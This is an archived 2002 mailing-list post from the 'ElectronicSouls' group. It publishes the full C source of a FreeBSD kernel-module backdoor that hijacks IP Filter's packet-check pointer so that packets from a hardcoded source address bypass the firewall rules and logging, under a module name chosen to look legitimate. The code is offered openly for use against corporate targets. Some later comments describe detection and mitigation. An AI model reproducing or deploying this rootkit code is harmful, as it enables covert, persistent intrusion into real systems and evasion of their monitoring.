Message-ID: <200211292130.gATLUbfT089645@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - ipf backdoor
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here is a backdoor you may find useful on your penetration tests; it
forces ip filter to receive packets from a specified IP, no matter what
the actual ipf rules are.
Put it to good use in the corporate world.
# cat ES-ipf0wn.c
/*
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
* !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
*
* IPF0wn (C) KernelPanic & BrainStorm [ElectronicSouls]
* Tested on: FreeBSD 3.4
*
* Idea- BrainStorm / KernelPanic
* Code- KernelPanic / BrainStorm
*
* this will get ipfilter to always accept packets from a special IP
*
* Brain's 1st LKM ! so b0w d0wn =)
*
* "BrainPanic, thats when kernelpanic and brainstorm get together and code ;)"
* Greetz:
* ElectronicSouls,ADM,anti.security.is,TESO,0x7f
*
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
* !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
*/
/*
 * Dotted-quad source address that myfr() exempts from filtering.
 * It is compiled in as a string and converted by inaton() on every packet.
 * For analysts: this literal is the only per-deployment value in the file;
 * the posted sample uses the loopback address.
 */
#define OWNED "127.0.0.1" /* guess what ?? */
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/malloc.h>
#include <sys/mbuf.h>
#include <sys/kernel.h>
#include <sys/proc.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>
/* Shorthand names for the IP header and mbuf structures used in the hook signature. */
typedef struct ip ip_t;
typedef struct mbuf mb_t;
/* Function type shared by the existing packet-check hook and the replacement below. */
typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **));
static int s_load __P((struct module *, int, void *));
static u_int32_t inaton __P((const char *));
/*
 * fr_checkp is defined outside this file; s_load() overwrites it on load.
 * NOTE(review): presumably this is the pointer the kernel IP path calls to
 * run IP Filter - confirm against the kernel source for the release in use.
 */
extern ipfr_t *fr_checkp;
/*
 * myfr is the replacement handler; fr keeps the pointer value found at load
 * time so that it can be chained to and put back on unload.
 */
static ipfr_t myfr, *fr;
/*
 * Module event handler: swaps the global packet-check pointer on load and
 * restores it on unload.
 *
 * module, arg: unused here.
 * cmd:         module event; only MOD_LOAD and MOD_UNLOAD are acted on,
 *              any other value falls through the switch untouched.
 * Returns 0 in every case.
 *
 * Defensive notes: the filter rule set itself is never modified, so listing
 * the rules will not reveal the change; what changes is the value of
 * fr_checkp, which after MOD_LOAD points at myfr in this module rather than
 * at the handler installed by the filter. Comparing that pointer against the
 * expected handler address, and restricting kernel module loading (for
 * example by running at a raised securelevel), are the relevant controls.
 */
static int
s_load (struct module *module, int cmd, void *arg)
{
int s;
switch(cmd)
{
case MOD_LOAD:
/* The swap is done between splnet() and splx(); presumably so the network path cannot run while the pointer is half-updated - confirm. */
s = splnet();
/* Remember the current handler, then install the replacement. */
fr = fr_checkp;
fr_checkp = myfr;
splx(s);
break;
case MOD_UNLOAD:
s = splnet();
/* Put back whatever handler was saved at load time. */
fr_checkp = fr;
splx(s);
break;
}
return 0;
}
/*
 * Module registration record: name string, event handler, and a third field
 * left as 0.
 * NOTE(review): "ipfil_mod" is the name registered with the kernel and looks
 * chosen to resemble a legitimate filter module; whether it shows up in
 * module listings depends on the tooling - verify on the affected release.
 */
static moduledata_t s_mod_1 = {
"ipfil_mod",
s_load,
0
};
/* Registers the record above with the module subsystem at SI_SUB_PSEUDO / SI_ORDER_ANY. */
DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY);
/*
 * Replacement packet-check handler installed by s_load().
 *
 * If the packet's IP source address equals OWNED it returns 0 without
 * calling the saved handler; every other packet is handed to the saved
 * handler unchanged and its verdict is returned.
 * NOTE(review): 0 is presumably the hook's "pass" verdict, which matches the
 * accompanying message ("always accept packets from a special IP") - confirm.
 *
 * Defensive notes: the match is on source address only (hlen, ifp, out and
 * mp are not examined), so the exemption holds for any packet carrying that
 * source address, whoever sent it. Because the saved handler is skipped for
 * those packets, any logging or accounting it would have done for them does
 * not happen either. inaton(OWNED) is re-evaluated on every call.
 */
static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
if(ip->ip_src.s_addr == inaton(OWNED))
return 0;
return(fr(ip, hlen, ifp, out, mp));
}
/*
 * Convert a dotted-quad string to a 32-bit value in network byte order.
 *
 * Exactly four rounds are run; each round shifts the accumulator left by one
 * byte and, if input remains, ORs in the next '.'-separated decimal field.
 * The accumulated value is then passed through htonl().
 *
 * No validation is performed: characters other than digits and field values
 * above 255 are folded into the result as they come, and fields missing from
 * the end of the string contribute zero bits.
 */
static u_int32_t
inaton(const char *str)
{
	unsigned long packed = 0;
	unsigned int field;
	int round = 0;

	while (round < 4) {
		packed <<= 8;
		if (*str != '\0') {
			/* Accumulate one decimal field up to the next dot or end of string. */
			for (field = 0; *str != '\0' && *str != '.'; str++)
				field = field * 10 + (*str - '0');
			packed |= field;
			/* Step over the separator, if there is one. */
			if (*str != '\0')
				str++;
		}
		round++;
	}
	return (htonl(packed));
}
/* ps: Brain- check the handler ..*/
/* and dont give it anyone outside ES yet ;) im sure you dont anyway ..later bro */
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Save the planet."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3n3JAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt5z0AnjvWtmx/V56T
aOTVxtLNuXtdqsMvAJ9e7on7bCgiF13/4ob7sfRznOWQeg==
=rUff
-----END PGP SIGNATURE-----